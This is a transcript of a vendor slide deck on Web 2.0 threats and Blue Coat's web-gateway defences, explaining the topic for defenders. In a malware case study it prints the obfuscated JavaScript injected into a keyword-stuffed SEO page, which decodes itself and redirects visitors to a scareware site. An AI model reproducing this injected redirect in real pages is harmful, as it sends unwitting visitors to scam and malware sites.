1 / 44

Living in a Web 2.0 World (and how BCSI can help!)

Living in a Web 2.0 World (and how BCSI can help!). Mark Stanford SE Manager. 20110 Ashbrook Place, Suite 275 Ashburn, VA 20147 (703) 857-2100 www.geobridge.net. Agenda. Definition of Web 2.0 Overview Real World Web 2.0 application and threat examples

zasha
Download Presentation

Living in a Web 2.0 World (and how BCSI can help!)

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Living in a Web 2.0World(and howBCSI canhelp!) Mark Stanford SE Manager 20110 Ashbrook Place, Suite 275 Ashburn, VA 20147 (703) 857-2100 www.geobridge.net

  2. Agenda • Definition of Web 2.0 • Overview • Real World Web 2.0 application and threat examples • BCSI countermeasures: Layered Security Defenses

  3. What is Web 2.0? Applications & Services Technologies & Programming Languages Software & Systems

  4. Web Evolution Static Pages Dynamic Pages Dynamic Pages Interactive Pages Publishing Model Community Model Single Host Pages Multi-Host Pages Nice to Have Must Have

  5. Cyber Crime Evolution Wide-spread, Fast Targeted Visible, DoS Invisible Damage/Defacement Data Collection/Identity Ingenuity/Pride Driven Profit Driven Amateurs Professionals

  6. Web 2.0 • Did NOT change… the OSI model the way IP addresses work the way URLs are handled the way Web Filtering works • DID change… how information gets posted, even legitimate sites how information may be presented By 2012 the Internet will be 75X larger than in 2002 What is required to find/identify threats on the web

  7. Web 2.0 Also Means 1 URL Leads to Many 12 Domains, 130 URLs (www.cnn.com, 31.03.2010, 10:12 a.m. German Time) 12 Domains, 246 URLs(www.bild.de, 31.03.2010, 10:17 a.m. German Time)

  8. Forums Blogs Wikis Guestbooks Web 2.0 and Search Engines www Search Engine View

  9. Malware Case Study 10

  10. WebPulse WebPulse saw a new referrer…

  11. Nothing here… <html><head><title>Install Keys Satellite</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta http-equiv="Content-Language" content="en-us" /> <meta name="robots" content="index, follow" /> </head><body bgcolor=#59746> <style> body { font-family: verdana; margin: 10px 100px; } </style> <h3>Install Keys Satellite</h3> <strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex <i>install linux suse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size: 16px;">have vb setup install jmail</font> axle install hellwig ghetto install s forum apron front sink install <u>tiger wood install</u> <b>install cobra fatty freeway bars</b> plasma install <strong>adaptec tape install</strong> <font color=#7B6DAC style="font-size: 12px;">remote install software</font> cnps 9500 install install modular plug rj45 <strong>can't install program</strong> <font color=#68D71E size=14>how to install neon tubes</font> <i>how to install themes for mac</i> 2003 install microsoft office <i>msdos install system</i> <b>software install through active directory</b> install vcr to dish network <strong>nero startsmart install error</strong> <b>blat install syntax</b> <i>dell workstation 360n install cpu</i> install setup install tunnel protectors <u>project 2007 how to install</u> <font color=#D8B88A style="font-size: 18px;">self install fire pit</font> <strong>install grub dual boot</strong> <b>deluxe install prizm pro</b> <b>how to install a window shutter</b> <b>install laminate over existing counter top</b> <font color=#41FE63 style="font-size: 12px;">linksys 54g install</font>

  12. So… How did the User get there?

  13. <script language="javascript"> function dF(s){var s1=unescape(s.substr(0,s.length-1));var t=""; for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write (unescape(t));} </script> Interesting… <html><head><title>Install Keys Satellite</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta http-equiv="Content-Language" content="en-us" /> <meta name="robots" content="index, follow" /> </head><body bgcolor=#59746> <script language="javascript"> document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%0D%0A%7D%0D%0A%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00tubcjmjuzjofutdbo/dpn0ijujo/qiq%264Gmboe%264E31%2637bggje%264E27%3A11%2633%264C%264D0tdsjqu%264F1'); </script> <style> body { font-family: verdana; margin: 10px 100px; } </style> <h3>Install Keys Satellite</h3> <strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex <i>install linux suse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size: <script> document.location="http://stabilityinetscan.com/hitin.php?land=20&affid=169"; </script>

  14. “A friendly piece of advice…”

  15. “You are in trouble…”

  16. “This is very serious”

  17. Web 2.0 Examples - Twitter • Still a toy or already a tool?

  18. Web 2.0 Examples - Mashups

  19. Web 2.0 Examples - Facebook • Still a toy or already a tool?

  20. Koobface worm (January 2009) • Invitation to click on a link in Facebook or Myspace in-box • Supposedly link to a funny video • Users where told that they have to update their flash player to view the video • The installed SW was a proxy server • Now selected traffic could be redirected to the attacker • A second program to download and install arbitrary code was installed, too  Like magic, the infected computer is now a zombie, under the control of unknown villains

  21. Changing Web Habits • Top 10 Categories – 2009 • WebFilter/WebPulse, 62M+ Users • 1. Social Networking • 2. Web Advertisements • 3. Search Engines/Portals • 4. Personals/Dating • 5. Pornography • 6. Computers/Internet • 7. Audio/Video Clips • 8. Adult/Mature Content • 9. Web Email • 10. Illegal/Questionable Social Networking Moved to #1 from #2 position Represents 25% of Top10 requests Web Email Dropped to #9 from #5 position Users migrating to social networking Cyber Crime Leverages Search engine poisoning Fake AV and Codec updates Popular site injections Death, Drama & Disaster lures Health & Wealth scams

  22. Layered Security Defenses

  23. Blue Coat Layered Defenses

  24. Hybrid Design WebFilter ProxySG & ProxyAV Architected to Deliver On-Demand Security Intelligence URL Filtering & Reporting Cloud threat protection Cloud Defenses Real-time web content ratings Web threat & malware detection Reputation ratings ProxyClient Remote Users Web Gateway Protection Inline threat analysis w/SSL Web filtering & content controls Media optimization + B/W Mgmt WebPulse Reporter WAN Web Industry’s leading collaborative cloud defense with 62M users Real-time inputs of any new web content and dynamic links Web protection, visibility, and reporting in any location

  25. WebPulse Malware Scanning Data Types Protocol Compliance Content Filters Active Content URL Filtering AAA Policy Method Controls Certificate Validation BCWF Log Files Reporter Blue Coat Secure Web Gateway Object Cache • ProxyAV: • Behavior based analysis • Signatures Bandwidth Management Protocol Optimization

  26. BCWF Malware Identification StrategyDynamic Link Analysis • Popular Web Site Pointers • Middle Relay Servers & Link Farms • Malware Download Hosts A C B Preserve Productivity

  27. Dynamic Link Analysis • Cloud connected community that is broad and diverse • Real-time input of new web links to the cloud service • Immediate analysis of URL chain for threats & rating • Update master database in cloud to protect all members Cloud Community

  28. Dynamic Link Analysis • Cloud connected community that is broad and diverse • Real-time input of new web links to the cloud service • Immediate analysis of URL for threats & rating • Update master database in cloud to protect all members Cloud Community

  29. Dynamic Link Analysis • Cloud connected community that is broad and diverse • Real-time input of new web links to the cloud service • Immediate analysis of URL for threats & rating • Update master database in cloud to protect all members Cloud Community

  30. Dynamic Link Analysis • Cloud connected community that is broad and diverse • Real-time input of new web links to the cloud service • Immediate analysis of URL for threats & rating • Update master database in cloud to protect all members Cloud Community

  31. Dynamic Link Analysis • Cloud connected community that is broad and diverse • Real-time input of new web links to the cloud service • Immediate analysis of full link chain for threats & rating • Update master database in cloud to protect all members Cloud Community Protects Web Gateways Remote Users

  32. WebPulse: First Complete DLA solution • New defense layer • Full Dynamic link analysis • Foundation for next generation URL filtering • Fast, Aware, Protective… for anyone, anywhere Cloud Community Protects WebPulse 62M Users ProxySG 2B reqs/week WebFilter Web Gateways ProxyClient K9 Remote Users

  33. Deep Background Rating Analysis (DBRA) • 2 Secs – 2hrs • RTT Balanced URL & Content Trainers URL Malware Real Time Boundary WebPulse Cloud Service ANZ Threat Analysis • 16 Sources • Signatures • Behavior • Heuristics • Reputation • Sandboxing Master Rating Database • Rating Servers • 300M Unique requests daily • 1.2B requests “rated” weekly • 50 languages • Fast (ms) – try it! VA HK UK CA WebPulse Clients Dynamic URL Cache BCWF Full List Dynamic URL Cache Dynamic URL Cache • “Uncategorized” sent to WebPulse for • Dynamic categorization • 62M+ User Community • 45B+ requests/week • Fully Configurable and Secure • 5 Min for security updates BCWF Full List ProxyAV ProxySG ProxyClient K-9 Web Protect

  34. Dual Cache Design Clean Object Cache Finger Print Cache ProxyAV: Co-Processor Architecture • Improved utilization with M:N ratio • Higher throughput per gateway • Results in less hardware (with new AV HW: always 1 SG – 1 AV sizing possible) • Optimized design ProxyAV ICAP, ICAP+, S-ICAP Internet Enterprise Network • Patience Page • Trickle First • Trickle Last • Defer Scan (media) ProxySG

  35. ProxyAV – anti-malware features • Don’t get confused by the name “AV” • Anti-malware features are more comprehensive then traditional pattern matching technologies Behavioral analysis Sandboxing Heuristics True file type detection Etc. • ProxyAV vs. competitors: Aurora exploit (CVE-2010-0249) Note: Finjan was not able to block the exploit without a security update  It is a different approach and philosophy

  36. ProxyClient included with WebFilter • Remote Filtering • Cloud Connected • Threat Protection • Acceleration • Central Policy • Reporting

  37. Why Blue Coat Products? • Unmatched policy controls & authentication options • Proactive Malware/MMC detection • Real-time web content analysis/DLA for gateway & client • URL database, threat detection, and DLP partners • Custom object-based OS with patented cache technologies • Broad proxy library & acceleration techniques • Bandwidth management & protocol optimization/compliance • Experience, Reliability, Performance All the RIGHT parts! Blue Coat Confidential Information

  38. Questions?

More Related